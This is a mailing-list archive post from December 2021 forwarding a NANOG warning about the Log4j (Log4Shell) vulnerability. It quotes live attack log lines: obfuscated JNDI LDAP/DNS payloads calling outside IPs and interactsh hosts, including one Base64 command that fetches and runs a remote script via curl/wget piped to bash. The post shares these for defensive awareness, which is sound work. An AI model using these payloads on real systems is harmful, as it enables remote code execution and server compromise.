From: Dave Taht <dave.taht@gmail.com>
To: bloat <bloat@lists.bufferbloat.net>
Subject: [Bloat] Fwd: Log4j mitigation
Date: Mon, 13 Dec 2021 05:56:36 -0800 [thread overview]
Message-ID: <CAA93jw7mbD2m8T_NdXy5-Vg_s7WVRhWNJ1sF2ZxW5Wc5AkWRiQ@mail.gmail.com> (raw)
In-Reply-To: <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de>
for those of you losing sleep over the java logging exploit, my heart
goes out to you.
While I'm glad I, personally, and on the bufferbloat related websites,
haven't got a single thing written in java, and I lost 3 weeks of my
life over christmas to spectre, and several weeks per year - and
usually, right around christmas! coping with other CVE's.... this one
seems so big and affecting so many other services I use, that I just
kind of want to take all my cash out of the bank, and log out, and
find a tropic island somewhere.
---------- Forwarded message ---------
From: Jörg Kost <jk@ip-clear.de>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <jean@ddostest.me>
Cc: <nanog@nanog.org>
You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL),
in Headers, in anything related to where a Java process does logging
with Log4j; it's innumerable. It might even evaluate from a URI itself;
it won't use a fixed port. It's not wormy right now, but maybe it will
soon.
We are seeing things like this since 10th of Dec. And this is only a
typical Apache Logfile for HTTP/HTTPS, where we do logging:
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}
GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281
"${jndi:dns://45.83.64.1/securityscan-http80}"
"${jndi:dns://45.83.64.1/securityscan-http80}
GET
/?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a}
HTTP/1.1" 200 -
"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}"
"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}
--
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org
Dave Täht CEO, TekLibre, LLC
next parent reply other threads:[~2021-12-13 13:56 UTC|newest]
Thread overview: 2+ messages / expand[flat|nested] mbox.gz Atom feed top
[not found] <CD4B66EC-8FFC-4911-A106-8DF4D7061E0B@andyring.com>
[not found] ` <9c4dc5e1-b35d-6a62-a8fc-cac729f585d1@foobar.org>
[not found] ` <002401d7f00f$c4fa1b60$4eee5220$@ddostest.me>
[not found] ` <41BB6B27-4870-49F2-BD83-354692A01081@ip-clear.de>
[not found] ` <002901d7f012$24093620$6c1ba260$@ddostest.me>
[not found] ` <CAAeewD-kYKf5+1r4jOZpPS1-ZqjAK7-CwadrZtS-LQjtQZgg3w@mail.gmail.com>
[not found] ` <003a01d7f014$fd8c6e10$f8a54a30$@ddostest.me>
[not found] ` <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de>
2021-12-13 13:56 ` Dave Taht [this message]
2021-12-13 19:42 ` David Lang
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
List information: https://lists.bufferbloat.net/postorius/lists/bloat.lists.bufferbloat.net/
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=CAA93jw7mbD2m8T_NdXy5-Vg_s7WVRhWNJ1sF2ZxW5Wc5AkWRiQ@mail.gmail.com \
--to=dave.taht@gmail.com \
--cc=bloat@lists.bufferbloat.net \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
Be sure your reply has a Subject: header at the top and a blank line
before the message body.
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox